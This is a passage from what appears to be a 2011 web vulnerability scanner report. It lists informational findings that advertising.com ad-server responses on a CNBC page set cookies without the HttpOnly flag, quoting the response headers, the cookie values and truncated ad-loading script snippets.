document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/242390407/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000981
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=84418946/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=aEl+NFJwHob0Fj6sIWwJoa8itKPCC0nBdJpwEg02FUMBdbdBFTwihXQxEwjmGUMBxGeBFTAQvaQxEQW4FUMBLppBFTQghXQxEgN5FUMB6ijBFTAmhXQxEAY4FUMBdDmBFTA/yaQxEAVZGUMBYimBFTA3WaQxEQY4FUMBFGeBFTAxBaQxEU1aGUMBbTeBFTQwBaQxEYnXGUMBWGoBFTgQvaQxEogmGUMBxmpBFTQRgaQxE0soGUMB8mpBFHZAmZOiGgZj0jw+NXcbtiGA8Mohj7a+AcsmGOuAEOpRAbLuBoKuGi/smJwokaEwzClALRqRAXaxAMdPGPwrQQwdIaMhq62ApVmhuTqHIUbNG6WtrCQIza4IwOICM/oxvB; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:13 GMT; path=/
F1=BoRU63EBAAAABAAAAUBA8BA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:13 GMT; path=/
BASE=x7Q9ei23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKeJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:13 GMT; path=/
ROLL=U6APSjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlO!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:13 GMT; path=/
84418946=_4dfa511a,2430472668,768034^994447^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.994447.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:53:13 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 602
Vary: Accept-Encoding
Date: Thu, 16 Jun 2011 18:53:14 GMT
Connection: close
Set-Cookie: C2=aEl+NFJwHob0Fj6sIWwJoa8itKPCC0nBdJpwEg02FUMBdbdBFTwihXQxEwjmGUMBxGeBFTAQvaQxEQW4FUMBLppBFTQghXQxEgN5FUMB6ijBFTAmhXQxEAY4FUMBdDmBFTA/yaQxEAVZGUMBYimBFTA3WaQxEQY4FUMBFGeBFTAxBaQxEU1aGUMBbTeBFTQwBaQxEYnXGUMBWGoBFTgQvaQxEogmGUMBxmpBFTQRgaQxE0soGUMB8mpBFHZAmZOiGgZj0jw+NXcbtiGA8Mohj7a+AcsmGOuAEOpRAbLuBoKuGi/smJwokaEwzClALRqRAXaxAMdPGPwrQQwdIaMhq62ApVmhuTqHIUbNG6WtrCQIza4IwOICM/oxvB; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:13 GMT; path=/
Set-Cookie: F1=BoRU63EBAAAABAAAAUBA8BA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:13 GMT; path=/
Set-Cookie: BASE=x7Q9ei23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKeJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:13 GMT; path=/
Set-Cookie: ROLL=U6APSjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlO!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:13 GMT; path=/
Set-Cookie: 84418946=_4dfa511a,2430472668,768034^994447^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6333.272756.AOL-ADVERTISING/B5305142.3;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mn
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=93497556/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=9Xl+NFJwHob0Ff6sIWwJoasitKPCC0nBcJpwEg02FQMBdbdBETwihXAxEwjmGQMBxGeBETAQvaAxEQW4FQMBLppBETQghXAxEgN5FQMB6ijBETAmhXAxEAY4FQMBdDmBETA/yaAxEAVZGQMBYimBETA3WaAxEQY4FQMBFGeBETAxBaAxEU1aGQMBbTeBETQwBaAxEYnXGQMBWGoBETgQvaAxEogmGQMBxmpBETQRgaAxE0soGQMB8mpBEHZAmZOiGcZj0jw+NXMbtiGA8Mohi7a+AcsmGKuAEOpR/aLuBoKuGe/smJwoka0vzClALRqR/WaxAMdPGLwrQQwdIa8gq62ApVmhtTqHIUbNG2WtrCQIzaoIwOICM/oxudr0IwKvGAH; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:05 GMT; path=/
F1=B0fV63EBAAAABAAAAwBA0BA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:05 GMT; path=/
BASE=x7Q9li23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/PNnXEVdwPsurMOKDL!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:05 GMT; path=/
ROLL=U6APVjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpK7KosVuHGql9By7NO!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:05 GMT; path=/
93497556=_4dfa55fd,1831880182,768034^1029516^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1029516.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 19:14:05 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 620
Date: Thu, 16 Jun 2011 19:14:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=9Xl+NFJwHob0Ff6sIWwJoasitKPCC0nBcJpwEg02FQMBdbdBETwihXAxEwjmGQMBxGeBETAQvaAxEQW4FQMBLppBETQghXAxEgN5FQMB6ijBETAmhXAxEAY4FQMBdDmBETA/yaAxEAVZGQMBYimBETA3WaAxEQY4FQMBFGeBETAxBaAxEU1aGQMBbTeBETQwBaAxEYnXGQMBWGoBETgQvaAxEogmGQMBxmpBETQRgaAxE0soGQMB8mpBEHZAmZOiGcZj0jw+NXMbtiGA8Mohi7a+AcsmGKuAEOpR/aLuBoKuGe/smJwoka0vzClALRqR/WaxAMdPGLwrQQwdIa8gq62ApVmhtTqHIUbNG2WtrCQIzaoIwOICM/oxudr0IwKvGAH; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:05 GMT; path=/
Set-Cookie: F1=B0fV63EBAAAABAAAAwBA0BA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:05 GMT; path=/
Set-Cookie: BASE=x7Q9li23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/PNnXEVdwPsurMOKDL!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:05 GMT; path=/
Set-Cookie: ROLL=U6APVjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpK7KosVuHGql9By7NO!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:05 GMT; path=/
Set-Cookie: 93497556=_4dfa55fd,1831880182,768034^1029516^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N1558.126262.AOLPERFORMANCENETWO/B5584755.3;sz=728x90;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/s
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=804480/size=300250/u=2/bnum=2746764/hr=7/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=1Yf+NFJwHob0Fv7sIWwJoasntKfBC0nxeKpwEg02FgNBdbdBYTwihXA2EwjmGgNBxGeBYTAQvaA2EQW4FgNBLppBYTQghXA2EgN5FgNB6ijBYTAmhXA2EAY4FgNBdDmBYTA/yaA2EAVZGgNBYimBYTA3WaA2EQY4FgNBFGeBYTAxBaA2EU1aGgNBbTeBYTQwBaA2EYnXGgNBWGoBYTgQvaA2EogmGgNBxmpBYTQRgaA2E0soGgNB8mpBYDrnA8ekGuQkBAAoNX8CmZOiGaKtyBw2sa4CNSPC73cBw1KaAwzgGavr5Dwxaao9CQ4kGNtt4Kgq4a4CzamAjSqRTPLUCsEpGNdpFDw09YsFvCBB3hoxXC; domain=advertising.com; expires=Sat, 15-Jun-2013 12:25:25 GMT; path=/
F1=BUj953EBAAAABAAAAMAAUEA; domain=advertising.com; expires=Sat, 15-Jun-2013 12:25:25 GMT; path=/
BASE=x7Q9Qi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYnL8A8d0iDEOliUSEDbOxBFe8Bbf0hn7jx9fCF!; domain=advertising.com; expires=Sat, 15-Jun-2013 12:25:25 GMT; path=/
ROLL=U6APBje2RKFWN9uaB4l2AhxSqVDmeNF!; domain=advertising.com; expires=Sat, 15-Jun-2013 12:25:25 GMT; path=/
2746764=_4df9f635,8183003516,804480^981602^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.981602.804480.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 12:25:25 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 665
Vary: Accept-Encoding
Date: Thu, 16 Jun 2011 12:25:25 GMT
Connection: close
Set-Cookie: C2=1Yf+NFJwHob0Fv7sIWwJoasntKfBC0nxeKpwEg02FgNBdbdBYTwihXA2EwjmGgNBxGeBYTAQvaA2EQW4FgNBLppBYTQghXA2EgN5FgNB6ijBYTAmhXA2EAY4FgNBdDmBYTA/yaA2EAVZGgNBYimBYTA3WaA2EQY4FgNBFGeBYTAxBaA2EU1aGgNBbTeBYTQwBaA2EYnXGgNBWGoBYTgQvaA2EogmGgNBxmpBYTQRgaA2E0soGgNB8mpBYDrnA8ekGuQkBAAoNX8CmZOiGaKtyBw2sa4CNSPC73cBw1KaAwzgGavr5Dwxaao9CQ4kGNtt4Kgq4a4CzamAjSqRTPLUCsEpGNdpFDw09YsFvCBB3hoxXC; domain=advertising.com; expires=Sat, 15-Jun-2013 12:25:25 GMT; path=/
Set-Cookie: F1=BUj953EBAAAABAAAAMAAUEA; domain=advertising.com; expires=Sat, 15-Jun-2013 12:25:25 GMT; path=/
Set-Cookie: BASE=x7Q9Qi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYnL8A8d0iDEOliUSEDbOxBFe8Bbf0hn7jx9fCF!; domain=advertising.com; expires=Sat, 15-Jun-2013 12:25:25 GMT; path=/
Set-Cookie: ROLL=U6APBje2RKFWN9uaB4l2AhxSqVDmeNF!; domain=advertising.com; expires=Sat, 15-Jun-2013 12:25:25 GMT; path=/
Set-Cookie: 2746764=_4df9f635,8183003516,804480^981602^1183^0,0_; domain=advertising.com; path=/click

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/242390405/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000804480/mnum=0000981
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=804480/size=300250/u=2/bnum=76077167/hr=7/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=YFf+NFJwHob0Fz7sIWwJoa8ntKfBC0nxfKpwEg02FkNBdbdBZTwihXQ2EwjmGkNBxGeBZTAQvaQ2EQW4FkNBLppBZTQghXQ2EgN5FkNB6ijBZTAmhXQ2EAY4FkNBdDmBZTA/yaQ2EAVZGkNBYimBZTA3WaQ2EQY4FkNBFGeBZTAxBaQ2EU1aGkNBbTeBZTQwBaQ2EYnXGkNBWGoBZTgQvaQ2EogmGkNBxmpBZTQRgaQ2E0soGkNB8mpBZDrnA8ekGyQkBAAoNXMDmZOiGeKtyBw2saIDNSPC73cBw1KaAwzgGevr5Dwxaa49CQ4kGRtt4Kgq4aIDzamAjSqRUPLUCsEpGRdpFDw09Y8FvCBB3hoxYC; domain=advertising.com; expires=Sat, 15-Jun-2013 12:04:40 GMT; path=/
F1=BgV853EBAAAABAAAAIAAcEA; domain=advertising.com; expires=Sat, 15-Jun-2013 12:04:40 GMT; path=/
BASE=x7Q9Pi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYnL8A8d0iDEOliUSEDbOxBFe8Bbf0B!; domain=advertising.com; expires=Sat, 15-Jun-2013 12:04:40 GMT; path=/
ROLL=U6APAje2RKFWN9uaB4l2AhB!; domain=advertising.com; expires=Sat, 15-Jun-2013 12:04:40 GMT; path=/
76077167=_4df9f158,6884555565,804480^956559^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.956559.804480.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 12:04:40 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 667
Date: Thu, 16 Jun 2011 12:04:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=YFf+NFJwHob0Fz7sIWwJoa8ntKfBC0nxfKpwEg02FkNBdbdBZTwihXQ2EwjmGkNBxGeBZTAQvaQ2EQW4FkNBLppBZTQghXQ2EgN5FkNB6ijBZTAmhXQ2EAY4FkNBdDmBZTA/yaQ2EAVZGkNBYimBZTA3WaQ2EQY4FkNBFGeBZTAxBaQ2EU1aGkNBbTeBZTQwBaQ2EYnXGkNBWGoBZTgQvaQ2EogmGkNBxmpBZTQRgaQ2E0soGkNB8mpBZDrnA8ekGyQkBAAoNXMDmZOiGeKtyBw2saIDNSPC73cBw1KaAwzgGevr5Dwxaa49CQ4kGRtt4Kgq4aIDzamAjSqRUPLUCsEpGRdpFDw09Y8FvCBB3hoxYC; domain=advertising.com; expires=Sat, 15-Jun-2013 12:04:40 GMT; path=/
Set-Cookie: F1=BgV853EBAAAABAAAAIAAcEA; domain=advertising.com; expires=Sat, 15-Jun-2013 12:04:40 GMT; path=/
Set-Cookie: BASE=x7Q9Pi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYnL8A8d0iDEOliUSEDbOxBFe8Bbf0B!; domain=advertising.com; expires=Sat, 15-Jun-2013 12:04:40 GMT; path=/
Set-Cookie: ROLL=U6APAje2RKFWN9uaB4l2AhB!; domain=advertising.com; expires=Sat, 15-Jun-2013 12:04:40 GMT; path=/
Set-Cookie: 76077167=_4df9f158,6884555565,804480^956559^1183^0,0_; domain=advertising.com; path=/click

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/242390405/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000804480/mnum=0000956
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=804481/size=728090/u=2/bnum=22657113/hr=8/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=BTg+NFJwHob0Fj7sIWwJoa8mtKPCC0nBtJpwEg02FUNBdbdBVTwihXQ1EwjmGUNBxGeBVTAQvaQ1EQW4FUNBLppBVTQghXQ1EgN5FUNB6ijBVTAmhXQ1EAY4FUNBdDmBVTA/yaQ1EAVZGUNBYimBVTA3WaQ1EQY4FUNBFGeBVTAxBaQ1EU1aGUNBbTeBVTQwBaQ1EYnXGUNBWGoBVTgQvaQ1EogmGUNBxmpBVTQRgaQ1E0soGUNB8mpBVDrnA8ekGiQkBAAoNXMCmZOiGgKtyBw2saICNSPC73cBw1KaAwzgGOvr5Dwxaa48CQ4kGBtt4Kgq4aICzamAjSqRQPLUCsEpGBdpFDw09Y8EvCBB3hoxUC; domain=advertising.com; expires=Sat, 15-Jun-2013 13:27:28 GMT; path=/
F1=BEMB63EBAAAABAAAAQAA8DA; domain=advertising.com; expires=Sat, 15-Jun-2013 13:27:28 GMT; path=/
BASE=x7Q9Qi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Bbf0hn7jx9fCF!; domain=advertising.com; expires=Sat, 15-Jun-2013 13:27:28 GMT; path=/
ROLL=U6APGje2RKFWN9uaB4l2AhxSqVDmeNFaNHEC/OJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 13:27:28 GMT; path=/
22657113=_4dfa04c1,6476384225,804481^894875^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.894875.804481.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 13:27:28 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 667
Date: Thu, 16 Jun 2011 13:27:29 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=BTg+NFJwHob0Fj7sIWwJoa8mtKPCC0nBtJpwEg02FUNBdbdBVTwihXQ1EwjmGUNBxGeBVTAQvaQ1EQW4FUNBLppBVTQghXQ1EgN5FUNB6ijBVTAmhXQ1EAY4FUNBdDmBVTA/yaQ1EAVZGUNBYimBVTA3WaQ1EQY4FUNBFGeBVTAxBaQ1EU1aGUNBbTeBVTQwBaQ1EYnXGUNBWGoBVTgQvaQ1EogmGUNBxmpBVTQRgaQ1E0soGUNB8mpBVDrnA8ekGiQkBAAoNXMCmZOiGgKtyBw2saICNSPC73cBw1KaAwzgGOvr5Dwxaa48CQ4kGBtt4Kgq4aICzamAjSqRQPLUCsEpGBdpFDw09Y8EvCBB3hoxUC; domain=advertising.com; expires=Sat, 15-Jun-2013 13:27:28 GMT; path=/
Set-Cookie: F1=BEMB63EBAAAABAAAAQAA8DA; domain=advertising.com; expires=Sat, 15-Jun-2013 13:27:28 GMT; path=/
Set-Cookie: BASE=x7Q9Qi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Bbf0hn7jx9fCF!; domain=advertising.com; expires=Sat, 15-Jun-2013 13:27:28 GMT; path=/
Set-Cookie: ROLL=U6APGje2RKFWN9uaB4l2AhxSqVDmeNFaNHEC/OJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 13:27:28 GMT; path=/
Set-Cookie: 22657113=_4dfa04c1,6476384225,804481^894875^1183^0,0_; domain=advertising.com; path=/click

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253735207/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000804481/mnum=0000894
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=804481/size=728090/u=2/bnum=91341378/hr=8/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=Xmg+NFJwHob0Ff7sIWwJoasmtKPCC0nBsJpwEg02FQNBdbdBUTwihXA1EwjmGQNBxGeBUTAQvaA1EQW4FQNBLppBUTQghXA1EgN5FQNB6ijBUTAmhXA1EAY4FQNBdDmBUTA/yaA1EAVZGQNBYimBUTA3WaA1EQY4FQNBFGeBUTAxBaA1EU1aGQNBbTeBUTQwBaA1EYnXGQNBWGoBUTgQvaA1EogmGQNBxmpBUTQRgaA1E0soGQNB8mpBUDrnA8ekGeQkBAAoNX8BmZOiGcKtyBw2sa4BNSPC73cBw1KaAwzgGKvr5Dwxaao8CQ4kG9st4Kgq4a4BzamAjSqRPPLUCsEpG9cpFDw09YsEvCBB3hoxTC; domain=advertising.com; expires=Sat, 15-Jun-2013 13:48:07 GMT; path=/
F1=BcZC63EBAAAABAAAAUAA0DA; domain=advertising.com; expires=Sat, 15-Jun-2013 13:48:07 GMT; path=/
BASE=x7Q9Ri23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Bbf0hn7jx9fCFhyHBGl9O!; domain=advertising.com; expires=Sat, 15-Jun-2013 13:48:07 GMT; path=/
ROLL=U6APHje2RKFWN9uaB4l2AhxSqVDmeNFaNHEC/OJMf0r/dZP!; domain=advertising.com; expires=Sat, 15-Jun-2013 13:48:07 GMT; path=/
91341378=_4dfa0997,2744854335,804481^956561^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.956561.804481.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 13:48:07 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 667
Date: Thu, 16 Jun 2011 13:48:07 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=Xmg+NFJwHob0Ff7sIWwJoasmtKPCC0nBsJpwEg02FQNBdbdBUTwihXA1EwjmGQNBxGeBUTAQvaA1EQW4FQNBLppBUTQghXA1EgN5FQNB6ijBUTAmhXA1EAY4FQNBdDmBUTA/yaA1EAVZGQNBYimBUTA3WaA1EQY4FQNBFGeBUTAxBaA1EU1aGQNBbTeBUTQwBaA1EYnXGQNBWGoBUTgQvaA1EogmGQNBxmpBUTQRgaA1E0soGQNB8mpBUDrnA8ekGeQkBAAoNX8BmZOiGcKtyBw2sa4BNSPC73cBw1KaAwzgGKvr5Dwxaao8CQ4kG9st4Kgq4a4BzamAjSqRPPLUCsEpG9cpFDw09YsEvCBB3hoxTC; domain=advertising.com; expires=Sat, 15-Jun-2013 13:48:07 GMT; path=/
Set-Cookie: F1=BcZC63EBAAAABAAAAUAA0DA; domain=advertising.com; expires=Sat, 15-Jun-2013 13:48:07 GMT; path=/
Set-Cookie: BASE=x7Q9Ri23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Bbf0hn7jx9fCFhyHBGl9O!; domain=advertising.com; expires=Sat, 15-Jun-2013 13:48:07 GMT; path=/
Set-Cookie: ROLL=U6APHje2RKFWN9uaB4l2AhxSqVDmeNFaNHEC/OJMf0r/dZP!; domain=advertising.com; expires=Sat, 15-Jun-2013 13:48:07 GMT; path=/
Set-Cookie: 91341378=_4dfa0997,2744854335,804481^956561^1183^0,0_; domain=advertising.com; path=/click

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/242390407/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000804481/mnum=0000956
...[SNIP]...

11.298. http://rover.ebay.com/ar/1/76417/4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rover.ebay.com
Path:	/ar/1/76417/4

Issue detail

